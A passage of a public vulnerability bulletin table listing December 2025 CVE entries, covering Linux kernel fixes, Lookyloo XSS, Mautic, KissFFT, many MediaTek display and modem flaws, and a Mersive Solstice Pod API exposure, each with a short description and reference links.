https://git.kernel.org/stable/c/55fb52ffdd62850d667ebed842815e072d3c9961 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb/server: fix possible refcount leak in smb2_sess_setup() Reference count of ksmbd_session will leak when session need reconnect. Fix this by adding the missing ksmbd_user_session_put(). | 2025-12-06 | not yet calculated | CVE-2025-40285 | https://git.kernel.org/stable/c/6fc935f798d44a8eb8a5e6659198399fbf57b981 https://git.kernel.org/stable/c/e671f9bb97805771380c98de944e2ceab6949188 https://git.kernel.org/stable/c/dcc51dfe6ff26b52cac106865a172ac982d78401 https://git.kernel.org/stable/c/d37b2c81c83d6c0d5ca582f4fe73c672983f9e0d https://git.kernel.org/stable/c/379510a815cb2e64eb0a379cb62295d6ade65df0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb/server: fix possible memory leak in smb2_read() Memory leak occurs when ksmbd_vfs_read() fails. Fix this by adding the missing kvfree(). | 2025-12-06 | not yet calculated | CVE-2025-40286 | https://git.kernel.org/stable/c/0797c6cf3b857cc229ab2bc69552938dcd738d78 https://git.kernel.org/stable/c/63d8706a2c09a0c29b8b0e8a44bc7a1339685de9 https://git.kernel.org/stable/c/f1305587731886da37a214cda812ade246c653b0 https://git.kernel.org/stable/c/bfda5422a16651d0bf864ec468b1c216e1b10d91 https://git.kernel.org/stable/c/6fced056d2cc8d01b326e6fcfabaacb9850b71a4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: exfat: fix improper check of dentry.stream.valid_size We found an infinite loop bug in the exFAT file system that can lead to a Denial-of-Service (DoS) condition. When a dentry in an exFAT filesystem is malformed, the following system calls - SYS_openat, SYS_ftruncate, and SYS_pwrite64 - can cause the kernel to hang. Root cause analysis shows that the size validation code in exfat_find() does not check whether dentry.stream.valid_size is negative. As a result, the system calls mentioned above can succeed and eventually trigger the DoS issue. This patch adds a check for negative dentry.stream.valid_size to prevent this vulnerability. | 2025-12-06 | not yet calculated | CVE-2025-40287 | https://git.kernel.org/stable/c/6c627bcc1896ba62ec793d0c00da74f3c93ce3ad https://git.kernel.org/stable/c/204b1b02ee018ba52ad2ece21fe3a8643d66a1b2 https://git.kernel.org/stable/c/82ebecdc74ff555daf70b811d854b1f32a296bea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Fix NULL pointer dereference in VRAM logic for APU devices Previously, APU platforms (and other scenarios with uninitialized VRAM managers) triggered a NULL pointer dereference in `ttm_resource_manager_usage()`. The root cause is not that the `struct ttm_resource_manager *man` pointer itself is NULL, but that `man->bdev` (the backing device pointer within the manager) remains uninitialized (NULL) on APUs-since APUs lack dedicated VRAM and do not fully set up VRAM manager structures. When `ttm_resource_manager_usage()` attempts to acquire `man->bdev->lru_lock`, it dereferences the NULL `man->bdev`, leading to a kernel OOPS. 1. **amdgpu_cs.c**: Extend the existing bandwidth control check in `amdgpu_cs_get_threshold_for_moves()` to include a check for `ttm_resource_manager_used()`. If the manager is not used (uninitialized `bdev`), return 0 for migration thresholds immediately-skipping VRAM-specific logic that would trigger the NULL dereference. 2. **amdgpu_kms.c**: Update the `AMDGPU_INFO_VRAM_USAGE` ioctl and memory info reporting to use a conditional: if the manager is used, return the real VRAM usage; otherwise, return 0. This avoids accessing `man->bdev` when it is NULL. 3. **amdgpu_virt.c**: Modify the vf2pf (virtual function to physical function) data write path. Use `ttm_resource_manager_used()` to check validity: if the manager is usable, calculate `fb_usage` from VRAM usage; otherwise, set `fb_usage` to 0 (APUs have no discrete framebuffer to report). This approach is more robust than APU-specific checks because it: - Works for all scenarios where the VRAM manager is uninitialized (not just APUs), - Aligns with TTM's design by using its native helper function, - Preserves correct behavior for discrete GPUs (which have fully initialized `man->bdev` and pass the `ttm_resource_manager_used()` check). v4: use ttm_resource_manager_used(&adev->mman.vram_mgr.manager) instead of checking the adev->gmc.is_app_apu flag (Christian) | 2025-12-06 | not yet calculated | CVE-2025-40288 | https://git.kernel.org/stable/c/e70113b741ba253886cd71dbadfe3ea444bb2f5c https://git.kernel.org/stable/c/1243e396148a65bb6c42a2b70fe43e50c16c494f https://git.kernel.org/stable/c/43aa61c18a3a45042b098b7a1186ffb29364002c https://git.kernel.org/stable/c/070bdce18fb12a49eb9c421e57df17d2ad29bf5f https://git.kernel.org/stable/c/883f309add55060233bf11c1ea6947140372920f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: hide VRAM sysfs attributes on GPUs without VRAM Otherwise accessing them can cause a crash. | 2025-12-06 | not yet calculated | CVE-2025-40289 | https://git.kernel.org/stable/c/39a1c8c860e32d775f29917939e87b6a7c08ebb1 https://git.kernel.org/stable/c/a67a9f99ce1306898d7129a199d42876bc06a0f0 https://git.kernel.org/stable/c/33cc891b56b93cad1a83263eaf2e417436f70c82 |
| loadedcommerce--Loaded Commerce | Loaded Commerce 6.6 contains a client-side template injection vulnerability that allows unauthenticated attackers to execute code on the server via the search parameter. | 2025-12-04 | not yet calculated | CVE-2025-66572 | ExploitDB-52084 Loaded Commerce Homepage https://www.vulncheck.com/advisories/loaded-commerce-66-client-side-template-injectioncsti |
| Lookyloo--lookyloo | Lookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other. Prior to 1.35.3, there are multiple XSS due to unsafe use of f-strings in Markup. The issue requires a malicious 3rd party server responding with a JSON document containing JS code in a script element. This vulnerability is fixed in 1.35.3. | 2025-12-02 | not yet calculated | CVE-2025-66458 | https://github.com/Lookyloo/lookyloo/security/advisories/GHSA-58h2-652v-gq87 https://github.com/Lookyloo/lookyloo/commit/b6ee2fee0afff0b35f37dd891bbce9d53ed8a290 |
| Lookyloo--lookyloo | Lookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other. Prior to 1.35.3, a XSS vulnerability can be triggered when a user submits a list of URLs to capture, one of them contains a HTML element, and the capture fails. Then, the error field is populated with an error message that contains the bad URL they tried to capture, triggering the XSS. This vulnerability is fixed in 1.35.3. | 2025-12-02 | not yet calculated | CVE-2025-66459 | https://github.com/Lookyloo/lookyloo/security/advisories/GHSA-hvmh-j2jx-48wg https://github.com/Lookyloo/lookyloo/commit/1850a34b8cec52438df3b544295b20cfa35f8ad1 https://github.com/Lookyloo/lookyloo/commit/8c3ab96de44c1ce15646d734aa06faf884329116 https://github.com/Lookyloo/lookyloo/commit/95cdc00fe37fd89790fa89bb3ee3fefa2da38442 |
| Lookyloo--lookyloo | Lookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other. Prior to 1.35.3, Lookyloo passed improperly escaped values to cells rendered in datatables using the orthogonal-data feature. It is definitely exploitable from the popup view, but it is most probably also exploitable in many other places. This vulnerability is fixed in 1.35.3. | 2025-12-02 | not yet calculated | CVE-2025-66460 | https://github.com/Lookyloo/lookyloo/security/advisories/GHSA-r93r-7jfr-99c3 https://github.com/Lookyloo/lookyloo/commit/63b39311f6b251a671895d97174345faf1b18e6e |
| Mautic--Mautic | Summary Arbitrary files can be uploaded via the GrapesJS Builder, as the types of files that can be uploaded are not restricted. ImpactIf the media folder is not restricted from running files this can lead to a remote code execution. | 2025-12-02 | not yet calculated | CVE-2025-13827 | https://github.com/mautic/mautic/security/advisories/GHSA-5xw2-57jx-pgjp |
| Mautic--Mautic | SummaryA non privileged user can install and remove arbitrary packages via composer for a composer based installed, even if the flag in update settings for enable composer based update is unticked. ImpactA low-privileged user of the platform can install malicious code to obtain higher privileges. | 2025-12-02 | not yet calculated | CVE-2025-13828 | https://github.com/mautic/mautic/security/advisories/GHSA-3fq7-c5m8-g86x |
| mayurik--dawa-pharma | dawa-pharma-1.0 allows unauthenticated attackers to execute SQL queries on the server, allowing them to access sensitive information and potentially gain administrative access. | 2025-12-04 | not yet calculated | CVE-2023-53734 | ExploitDB-51818 Mayuri K Pharmacy Billing Software GitHub Repository for CVE-nu11secur1ty nu11secur1ty Home Page https://www.vulncheck.com/advisories/dawa-pharma-10-sql-injection-via-email-parameter |
| mborgerding/kissfft--mborgerding/kissfft | KissFFT versions prior to the fix commit 1b083165 contain an integer overflow in kiss_fft_alloc() in kiss_fft.c on platforms where size_t is 32-bit. The nfft parameter is not validated before being used in a size calculation (sizeof(kiss_fft_cpx) * (nfft - 1)), which can wrap to a small value when nfft is large. As a result, malloc() allocates an undersized buffer and the subsequent twiddle-factor initialization loop writes nfft elements, causing a heap buffer overflow. This vulnerability only affects 32-bit architectures. | 2025-12-01 | not yet calculated | CVE-2025-34297 | https://github.com/mborgerding/kissfft/commit/1b08316582049c3716154caefc0deab8758506e3 https://github.com/mborgerding/kissfft/issues/120 https://www.vulncheck.com/advisories/kissfft-integer-overflow-heap-buffer-overflow |
| MediaTek, Inc.--MT2718, MT2737, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6893, MT6895, MT6897, MT6899, MT6980D, MT6983, MT6985, MT6989, MT6990, MT6991, MT8113, MT8115, MT8139, MT8163, MT8168, MT8169, MT8183, MT8186, MT8188, MT8512, MT8516, MT8518, MT8519, MT8532, MT8676, MT8678, MT8695, MT8696, MT8698 | In aee daemon, there is a possible system crash due to a race condition. This could lead to local denial of service if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10190802; Issue ID: MSV-4833. | 2025-12-02 | not yet calculated | CVE-2025-20765 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793 | In display, there is a possible memory corruption due to improper input validation. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4820. | 2025-12-02 | not yet calculated | CVE-2025-20766 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793 | In display, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4807. | 2025-12-02 | not yet calculated | CVE-2025-20767 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793 | In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4804. | 2025-12-02 | not yet calculated | CVE-2025-20769 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4803. | 2025-12-02 | not yet calculated | CVE-2025-20770 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793 | In display, there is a possible escalation of privilege due to improper input validation. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4802. | 2025-12-02 | not yet calculated | CVE-2025-20771 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4801. | 2025-12-02 | not yet calculated | CVE-2025-20772 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4797. | 2025-12-02 | not yet calculated | CVE-2025-20773 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793 | In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4796. | 2025-12-02 | not yet calculated | CVE-2025-20774 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT2737, MT6813, MT6833, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6878, MT6878M, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6980D, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8673, MT8675, MT8676, MT8678, MT8755, MT8771, MT8791, MT8791T, MT8792, MT8793, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893 | In Modem, there is a possible system crash due to an incorrect bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01689251; Issue ID: MSV-4840. | 2025-12-02 | not yet calculated | CVE-2025-20754 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT2737, MT6813, MT6833, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6878, MT6878M, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6980D, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8673, MT8675, MT8676, MT8678, MT8755, MT8771, MT8791, MT8791T, MT8792, MT8793, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893 | In Modem, there is a possible system crash due to an uncaught exception. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01673755; Issue ID: MSV-4647. | 2025-12-02 | not yet calculated | CVE-2025-20758 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT2737, MT6813, MT6833, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6878, MT6878M, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6980D, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8676, MT8791T | In Modem, there is a possible system crash due to a missing bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01270690; Issue ID: MSV-4301. | 2025-12-02 | not yet calculated | CVE-2025-20752 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT2737, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6980, MT6980D, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT8673, MT8675, MT8771, MT8791, MT8791T, MT8795T, MT8797, MT8798, MT8893 | In Modem, there is a possible out of bounds read due to a missing bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01673760; Issue ID: MSV-4650. | 2025-12-02 | not yet calculated | CVE-2025-20759 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT2737, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6980, MT6980D, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT8675, MT8771, MT8791, MT8791T, MT8797 | In Modem, there is a possible system crash due to an uncaught exception. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01689252; Issue ID: MSV-4841. | 2025-12-02 | not yet calculated | CVE-2025-20753 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8673, MT8675, MT8676, MT8678, MT8755, MT8771, MT8791, MT8791T, MT8792, MT8793, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893 | In Modem, there is a possible system crash due to a logic error. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01673749; Issue ID: MSV-4643. | 2025-12-02 | not yet calculated | CVE-2025-20756 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8675, MT8771, MT8791, MT8791T, MT8797 | In Modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01661199; Issue ID: MSV-4296. | 2025-12-02 | not yet calculated | CVE-2025-20750 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8675, MT8771, MT8791, MT8791T, MT8797 | In Modem, there is a possible system crash due to a missing bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01661195; Issue ID: MSV-4297. | 2025-12-02 | not yet calculated | CVE-2025-20751 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8675, MT8771, MT8791, MT8791T, MT8797 | In Modem, there is a possible application crash due to improper input validation. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY00628396; Issue ID: MSV-4775. | 2025-12-02 | not yet calculated | CVE-2025-20755 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8675, MT8771, MT8791, MT8791T, MT8797 | In Modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01673751; Issue ID: MSV-4644. | 2025-12-02 | not yet calculated | CVE-2025-20757 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8675, MT8771, MT8791, MT8791T, MT8797 | In Modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01677581; Issue ID: MSV-4701. | 2025-12-02 | not yet calculated | CVE-2025-20790 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8675, MT8771, MT8791, MT8791T, MT8797 | In Modem, there is a possible system crash due to incorrect error handling. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01661189; Issue ID: MSV-4298. | 2025-12-02 | not yet calculated | CVE-2025-20791 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT2735, MT6833, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8791T | In Modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01717526; Issue ID: MSV-5591. | 2025-12-02 | not yet calculated | CVE-2025-20792 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991 | In display, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10196993; Issue ID: MSV-4805. | 2025-12-02 | not yet calculated | CVE-2025-20768 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10182914; Issue ID: MSV-4795. | 2025-12-02 | not yet calculated | CVE-2025-20775 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10184297; Issue ID: MSV-4759. | 2025-12-02 | not yet calculated | CVE-2025-20776 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10184870; Issue ID: MSV-4752. | 2025-12-02 | not yet calculated | CVE-2025-20777 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793, MT8796, MT8873, MT8893 | In smi, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10259774; Issue ID: MSV-5029. | 2025-12-02 | not yet calculated | CVE-2025-20764 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT6781, MT6833, MT6853, MT6877, MT6893, MT8196 | In GPU pdma, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS10117741; Issue ID: MSV-4538. | 2025-12-02 | not yet calculated | CVE-2025-20789 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8792, MT8793, MT8796, MT8873, MT8893 | In mmdvfs, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10267218; Issue ID: MSV-5032. | 2025-12-02 | not yet calculated | CVE-2025-20763 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| MediaTek, Inc.--MT6991, MT8196 | In GPU pdma, there is a possible memory corruption due to a missing permission check. This could lead to local denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS10117735; Issue ID: MSV-4539. | 2025-12-02 | not yet calculated | CVE-2025-20788 | https://corp.mediatek.com/product-security-bulletin/December-2025 |
| mersive--Solstice Pod API Session Key Extraction via API Endpoint | Solstice Pod API (version 5.5, 6.2) contains an unauthenticated API endpoint (`/api/config`) that exposes sensitive information such as the session key, server version, product details, and display name. Unauthorized users can extract live session information by accessing this endpoint without authentication. | 2025-12-04 | not yet calculated | CVE-2025-66573 | ExploitDB-52104 Mersive Homepage Solstice Documentation https://www.vulncheck.com/advisories/solstice-pod-api-session-key-extraction-via-api-endpoint |
